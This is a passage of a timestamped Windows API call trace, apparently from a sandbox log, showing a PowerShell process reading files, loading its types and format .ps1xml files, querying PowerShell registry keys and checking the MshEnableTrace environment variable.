	[0566.765] ReadFile (in: hFile=0x334, lpBuffer=0x2d91b10, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x28d6c8, lpOverlapped=0x0 | out: lpBuffer=0x2d91b10*, lpNumberOfBytesRead=0x28d6c8*=0x1000, lpOverlapped=0x0) returned 1
	[0566.765] ReadFile (in: hFile=0x334, lpBuffer=0x2d91b10, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x28d6c8, lpOverlapped=0x0 | out: lpBuffer=0x2d91b10*, lpNumberOfBytesRead=0x28d6c8*=0x1000, lpOverlapped=0x0) returned 1
	[0566.766] ReadFile (in: hFile=0x334, lpBuffer=0x2d91b10, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x28d6c8, lpOverlapped=0x0 | out: lpBuffer=0x2d91b10*, lpNumberOfBytesRead=0x28d6c8*=0x1000, lpOverlapped=0x0) returned 1
	[0566.766] ReadFile (in: hFile=0x334, lpBuffer=0x2d91b10, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x28d6c8, lpOverlapped=0x0 | out: lpBuffer=0x2d91b10*, lpNumberOfBytesRead=0x28d6c8*=0x1000, lpOverlapped=0x0) returned 1
	[0566.766] ReadFile (in: hFile=0x334, lpBuffer=0x2d91b10, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x28d6c8, lpOverlapped=0x0 | out: lpBuffer=0x2d91b10*, lpNumberOfBytesRead=0x28d6c8*=0x1000, lpOverlapped=0x0) returned 1
	[0568.095] ReadFile (in: hFile=0x334, lpBuffer=0x2d91b10, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x28d6c8, lpOverlapped=0x0 | out: lpBuffer=0x2d91b10*, lpNumberOfBytesRead=0x28d6c8*=0x1000, lpOverlapped=0x0) returned 1
	[0568.095] ReadFile (in: hFile=0x334, lpBuffer=0x2d91b10, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x28d6c8, lpOverlapped=0x0 | out: lpBuffer=0x2d91b10*, lpNumberOfBytesRead=0x28d6c8*=0x1000, lpOverlapped=0x0) returned 1
	[0568.095] ReadFile (in: hFile=0x334, lpBuffer=0x2d91b10, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x28d6c8, lpOverlapped=0x0 | out: lpBuffer=0x2d91b10*, lpNumberOfBytesRead=0x28d6c8*=0x1000, lpOverlapped=0x0) returned 1
	[0568.096] ReadFile (in: hFile=0x334, lpBuffer=0x2d91b10, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x28d6c8, lpOverlapped=0x0 | out: lpBuffer=0x2d91b10*, lpNumberOfBytesRead=0x28d6c8*=0x1000, lpOverlapped=0x0) returned 1
	[0568.096] ReadFile (in: hFile=0x334, lpBuffer=0x2d91b10, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x28d6c8, lpOverlapped=0x0 | out: lpBuffer=0x2d91b10*, lpNumberOfBytesRead=0x28d6c8*=0x1000, lpOverlapped=0x0) returned 1
	[0568.097] ReadFile (in: hFile=0x334, lpBuffer=0x2d91b10, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x28d6c8, lpOverlapped=0x0 | out: lpBuffer=0x2d91b10*, lpNumberOfBytesRead=0x28d6c8*=0x1000, lpOverlapped=0x0) returned 1
	[0568.097] ReadFile (in: hFile=0x334, lpBuffer=0x2d91b10, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x28d6c8, lpOverlapped=0x0 | out: lpBuffer=0x2d91b10*, lpNumberOfBytesRead=0x28d6c8*=0x1000, lpOverlapped=0x0) returned 1
	[0568.097] ReadFile (in: hFile=0x334, lpBuffer=0x2d91b10, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x28d6c8, lpOverlapped=0x0 | out: lpBuffer=0x2d91b10*, lpNumberOfBytesRead=0x28d6c8*=0x1000, lpOverlapped=0x0) returned 1
	[0568.098] ReadFile (in: hFile=0x334, lpBuffer=0x2d91b10, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x28d6c8, lpOverlapped=0x0 | out: lpBuffer=0x2d91b10*, lpNumberOfBytesRead=0x28d6c8*=0x1000, lpOverlapped=0x0) returned 1
	[0568.098] ReadFile (in: hFile=0x334, lpBuffer=0x2d91b10, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x28d6c8, lpOverlapped=0x0 | out: lpBuffer=0x2d91b10*, lpNumberOfBytesRead=0x28d6c8*=0x1000, lpOverlapped=0x0) returned 1
	[0568.098] ReadFile (in: hFile=0x334, lpBuffer=0x2d91b10, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x28d6c8, lpOverlapped=0x0 | out: lpBuffer=0x2d91b10*, lpNumberOfBytesRead=0x28d6c8*=0x1000, lpOverlapped=0x0) returned 1
	[0568.099] ReadFile (in: hFile=0x334, lpBuffer=0x2d91b10, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x28d6c8, lpOverlapped=0x0 | out: lpBuffer=0x2d91b10*, lpNumberOfBytesRead=0x28d6c8*=0x1000, lpOverlapped=0x0) returned 1
	[0568.099] ReadFile (in: hFile=0x334, lpBuffer=0x2d91b10, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x28d6c8, lpOverlapped=0x0 | out: lpBuffer=0x2d91b10*, lpNumberOfBytesRead=0x28d6c8*=0x1000, lpOverlapped=0x0) returned 1
	[0568.100] ReadFile (in: hFile=0x334, lpBuffer=0x2d91b10, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x28d6c8, lpOverlapped=0x0 | out: lpBuffer=0x2d91b10*, lpNumberOfBytesRead=0x28d6c8*=0x1000, lpOverlapped=0x0) returned 1
	[0568.100] ReadFile (in: hFile=0x334, lpBuffer=0x2d91b10, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x28d6c8, lpOverlapped=0x0 | out: lpBuffer=0x2d91b10*, lpNumberOfBytesRead=0x28d6c8*=0x1000, lpOverlapped=0x0) returned 1
	[0568.100] ReadFile (in: hFile=0x334, lpBuffer=0x2d91b10, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x28d6c8, lpOverlapped=0x0 | out: lpBuffer=0x2d91b10*, lpNumberOfBytesRead=0x28d6c8*=0x1000, lpOverlapped=0x0) returned 1
	[0568.107] ReadFile (in: hFile=0x334, lpBuffer=0x2d91b10, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x28d6c8, lpOverlapped=0x0 | out: lpBuffer=0x2d91b10*, lpNumberOfBytesRead=0x28d6c8*=0x1000, lpOverlapped=0x0) returned 1
	[0568.110] ReadFile (in: hFile=0x334, lpBuffer=0x2d91b10, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x28d6c8, lpOverlapped=0x0 | out: lpBuffer=0x2d91b10*, lpNumberOfBytesRead=0x28d6c8*=0x1000, lpOverlapped=0x0) returned 1
	[0568.111] ReadFile (in: hFile=0x334, lpBuffer=0x2d91b10, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x28d6c8, lpOverlapped=0x0 | out: lpBuffer=0x2d91b10*, lpNumberOfBytesRead=0x28d6c8*=0x1000, lpOverlapped=0x0) returned 1
	[0568.111] ReadFile (in: hFile=0x334, lpBuffer=0x2d91b10, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x28d6c8, lpOverlapped=0x0 | out: lpBuffer=0x2d91b10*, lpNumberOfBytesRead=0x28d6c8*=0x1000, lpOverlapped=0x0) returned 1
	[0568.111] ReadFile (in: hFile=0x334, lpBuffer=0x2d91b10, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x28d6c8, lpOverlapped=0x0 | out: lpBuffer=0x2d91b10*, lpNumberOfBytesRead=0x28d6c8*=0x1000, lpOverlapped=0x0) returned 1
	[0568.112] ReadFile (in: hFile=0x334, lpBuffer=0x2d91b10, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x28d6c8, lpOverlapped=0x0 | out: lpBuffer=0x2d91b10*, lpNumberOfBytesRead=0x28d6c8*=0x1000, lpOverlapped=0x0) returned 1
	[0568.112] ReadFile (in: hFile=0x334, lpBuffer=0x2d91b10, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x28d6c8, lpOverlapped=0x0 | out: lpBuffer=0x2d91b10*, lpNumberOfBytesRead=0x28d6c8*=0x1000, lpOverlapped=0x0) returned 1
	[0568.113] ReadFile (in: hFile=0x334, lpBuffer=0x2d91b10, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x28d6c8, lpOverlapped=0x0 | out: lpBuffer=0x2d91b10*, lpNumberOfBytesRead=0x28d6c8*=0x1000, lpOverlapped=0x0) returned 1
	[0568.113] ReadFile (in: hFile=0x334, lpBuffer=0x2d91b10, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x28d6c8, lpOverlapped=0x0 | out: lpBuffer=0x2d91b10*, lpNumberOfBytesRead=0x28d6c8*=0x1b4, lpOverlapped=0x0) returned 1
	[0568.113] ReadFile (in: hFile=0x334, lpBuffer=0x2d91b10, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x28d6c8, lpOverlapped=0x0 | out: lpBuffer=0x2d91b10*, lpNumberOfBytesRead=0x28d6c8*=0x0, lpOverlapped=0x0) returned 1
	[0568.113] CloseHandle (hObject=0x334) returned 1
	[0568.113] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", nBufferLength=0x105, lpBuffer=0x28d3e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", lpFilePart=0x0) returned 0x37
	[0568.114] SetErrorMode (uMode=0x1) returned 0x1
	[0568.114] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\types.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x28d640 | out: lpFileInformation=0x28d640*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe968c5bf, ftCreationTime.dwHighDateTime=0x1c9ea0b, ftLastAccessTime.dwLowDateTime=0xe968c5bf, ftLastAccessTime.dwHighDateTime=0x1c9ea0b, ftLastWriteTime.dwLowDateTime=0xe968c5bf, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x291b4)) returned 1
	[0568.114] SetErrorMode (uMode=0x1) returned 0x1
	[0568.114] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", nBufferLength=0x105, lpBuffer=0x28d370, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", lpFilePart=0x0) returned 0x37
	[0568.114] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x28d728 | out: phkResult=0x28d728*=0x334) returned 0x0
	[0568.114] RegQueryValueExW (in: hKey=0x334, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x28d6ac, lpData=0x0, lpcbData=0x28d6a8*=0x0 | out: lpType=0x28d6ac*=0x1, lpData=0x0, lpcbData=0x28d6a8*=0x56) returned 0x0
	[0568.114] CoTaskMemAlloc (cb=0x5a) returned 0x1b8ed770
	[0568.114] RegQueryValueExW (in: hKey=0x334, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x28d67c, lpData=0x1b8ed770, lpcbData=0x28d678*=0x56 | out: lpType=0x28d67c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x28d678*=0x56) returned 0x0
	[0568.115] CoTaskMemFree (pv=0x1b8ed770) 
	[0568.115] RegCloseKey (hKey=0x334) returned 0x0
	[0568.115] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", nBufferLength=0x105, lpBuffer=0x28d370, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", lpFilePart=0x0) returned 0x37
	[0568.115] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", nBufferLength=0x105, lpBuffer=0x28d220, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", lpFilePart=0x0) returned 0x37
	[0574.373] VirtualQuery (in: lpAddress=0x28c410, lpBuffer=0x28d2d0, dwLength=0x30 | out: lpBuffer=0x28d2d0*(BaseAddress=0x28c000, AllocationBase=0x210000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0575.695] VirtualQuery (in: lpAddress=0x28c410, lpBuffer=0x28d2d0, dwLength=0x30 | out: lpBuffer=0x28d2d0*(BaseAddress=0x28c000, AllocationBase=0x210000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0577.237] VirtualQuery (in: lpAddress=0x28c410, lpBuffer=0x28d2d0, dwLength=0x30 | out: lpBuffer=0x28d2d0*(BaseAddress=0x28c000, AllocationBase=0x210000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0577.238] VirtualQuery (in: lpAddress=0x28c410, lpBuffer=0x28d2d0, dwLength=0x30 | out: lpBuffer=0x28d2d0*(BaseAddress=0x28c000, AllocationBase=0x210000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0577.239] VirtualQuery (in: lpAddress=0x28c410, lpBuffer=0x28d2d0, dwLength=0x30 | out: lpBuffer=0x28d2d0*(BaseAddress=0x28c000, AllocationBase=0x210000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0577.240] VirtualQuery (in: lpAddress=0x28c410, lpBuffer=0x28d2d0, dwLength=0x30 | out: lpBuffer=0x28d2d0*(BaseAddress=0x28c000, AllocationBase=0x210000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0577.241] VirtualQuery (in: lpAddress=0x28c410, lpBuffer=0x28d2d0, dwLength=0x30 | out: lpBuffer=0x28d2d0*(BaseAddress=0x28c000, AllocationBase=0x210000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0579.175] CoTaskMemAlloc (cb=0x104) returned 0x49d030
	[0579.175] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x49d030, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0579.175] CoTaskMemFree (pv=0x49d030) 
	[0580.851] VirtualQuery (in: lpAddress=0x28c410, lpBuffer=0x28d2d0, dwLength=0x30 | out: lpBuffer=0x28d2d0*(BaseAddress=0x28c000, AllocationBase=0x210000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0580.880] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Microsoft\\PowerShell\\1\\ShellIds\\Microsoft.PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x28d8c8 | out: phkResult=0x28d8c8*=0x310) returned 0x0
	[0580.880] RegQueryValueExW (in: hKey=0x310, lpValueName="path", lpReserved=0x0, lpType=0x28d8dc, lpData=0x0, lpcbData=0x28d8d8*=0x0 | out: lpType=0x28d8dc*=0x1, lpData=0x0, lpcbData=0x28d8d8*=0x74) returned 0x0
	[0580.880] RegQueryValueExW (in: hKey=0x310, lpValueName="path", lpReserved=0x0, lpType=0x28d84c, lpData=0x0, lpcbData=0x28d848*=0x0 | out: lpType=0x28d84c*=0x1, lpData=0x0, lpcbData=0x28d848*=0x74) returned 0x0
	[0580.880] CoTaskMemAlloc (cb=0x78) returned 0x4280e0
	[0580.880] RegQueryValueExW (in: hKey=0x310, lpValueName="path", lpReserved=0x0, lpType=0x28d81c, lpData=0x4280e0, lpcbData=0x28d818*=0x74 | out: lpType=0x28d81c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", lpcbData=0x28d818*=0x74) returned 0x0
	[0580.880] CoTaskMemFree (pv=0x4280e0) 
	[0580.880] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", nBufferLength=0x105, lpBuffer=0x28d590, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpFilePart=0x0) returned 0x2a
	[0580.880] SetErrorMode (uMode=0x1) returned 0x1
	[0580.880] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0"), fInfoLevelId=0x0, lpFileInformation=0x28d7a0 | out: lpFileInformation=0x28d7a0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80093051, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x1dba44b2, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1dba44b2, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x1000)) returned 1
	[0580.881] SetErrorMode (uMode=0x1) returned 0x1
	[0580.882] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", nBufferLength=0x105, lpBuffer=0x28d590, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", lpFilePart=0x0) returned 0x44
	[0580.882] SetErrorMode (uMode=0x1) returned 0x1
	[0580.882] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\diagnostics.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x28d7a0 | out: lpFileInformation=0x28d7a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67d93418, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67d93418, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe5e03e37, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x69e2)) returned 1
	[0580.882] SetErrorMode (uMode=0x1) returned 0x1
	[0580.882] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", nBufferLength=0x105, lpBuffer=0x28d590, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", lpFilePart=0x0) returned 0x3e
	[0580.883] SetErrorMode (uMode=0x1) returned 0x1
	[0580.883] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\wsman.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x28d7a0 | out: lpFileInformation=0x28d7a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67f36317, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67f36317, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe6065417, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x5fb2)) returned 1
	[0580.883] SetErrorMode (uMode=0x1) returned 0x1
	[0580.883] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", nBufferLength=0x105, lpBuffer=0x28d590, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0580.883] SetErrorMode (uMode=0x1) returned 0x1
	[0580.883] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\certificate.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x28d7a0 | out: lpFileInformation=0x28d7a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67ddf6d2, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67ddf6d2, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe5dddcd9, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x6aca)) returned 1
	[0580.883] SetErrorMode (uMode=0x1) returned 0x1
	[0580.883] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", nBufferLength=0x105, lpBuffer=0x28d590, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0580.883] SetErrorMode (uMode=0x1) returned 0x1
	[0580.884] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\dotnettypes.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x28d7a0 | out: lpFileInformation=0x28d7a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67e0582f, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67e0582f, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe5e29f95, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x11bce)) returned 1
	[0580.884] SetErrorMode (uMode=0x1) returned 0x1
	[0580.884] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", nBufferLength=0x105, lpBuffer=0x28d590, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", lpFilePart=0x0) returned 0x43
	[0580.884] SetErrorMode (uMode=0x1) returned 0x1
	[0580.884] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\filesystem.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x28d7a0 | out: lpFileInformation=0x28d7a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67e2b98c, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67e2b98c, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe5e76251, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x6119)) returned 1
	[0580.884] SetErrorMode (uMode=0x1) returned 0x1
	[0580.884] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", nBufferLength=0x105, lpBuffer=0x28d590, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", lpFilePart=0x0) returned 0x3d
	[0580.884] SetErrorMode (uMode=0x1) returned 0x1
	[0582.540] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\help.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x28d7a0 | out: lpFileInformation=0x28d7a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67e51ae9, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67e51ae9, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe5e9c3af, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x3ef37)) returned 1
	[0582.540] SetErrorMode (uMode=0x1) returned 0x1
	[0582.540] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml", nBufferLength=0x105, lpBuffer=0x28d590, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml", lpFilePart=0x0) returned 0x47
	[0582.541] SetErrorMode (uMode=0x1) returned 0x1
	[0582.541] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershellcore.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x28d7a0 | out: lpFileInformation=0x28d7a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67e9dda3, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67e9dda3, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe601915b, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x15e67)) returned 1
	[0582.541] SetErrorMode (uMode=0x1) returned 0x1
	[0582.541] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml", nBufferLength=0x105, lpBuffer=0x28d590, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml", lpFilePart=0x0) returned 0x48
	[0582.541] SetErrorMode (uMode=0x1) returned 0x1
	[0582.541] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershelltrace.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x28d7a0 | out: lpFileInformation=0x28d7a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67eea05d, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67eea05d, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe601915b, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x48b4)) returned 1
	[0582.541] SetErrorMode (uMode=0x1) returned 0x1
	[0582.541] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml", nBufferLength=0x105, lpBuffer=0x28d590, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml", lpFilePart=0x0) returned 0x41
	[0582.541] SetErrorMode (uMode=0x1) returned 0x1
	[0582.542] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\registry.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x28d7a0 | out: lpFileInformation=0x28d7a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67eea05d, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67eea05d, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe603f2b9, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x4e98)) returned 1
	[0582.542] SetErrorMode (uMode=0x1) returned 0x1
	[0582.543] CoTaskMemAlloc (cb=0x104) returned 0x49d030
	[0582.543] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x49d030, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0582.543] CoTaskMemFree (pv=0x49d030) 
	[0582.556] CoTaskMemAlloc (cb=0x104) returned 0x49d030
	[0582.556] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x49d030, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0582.556] CoTaskMemFree (pv=0x49d030) 
	[0582.557] CoTaskMemAlloc (cb=0x104) returned 0x49d030
	[0582.557] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x49d030, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0582.558] CoTaskMemFree (pv=0x49d030) 
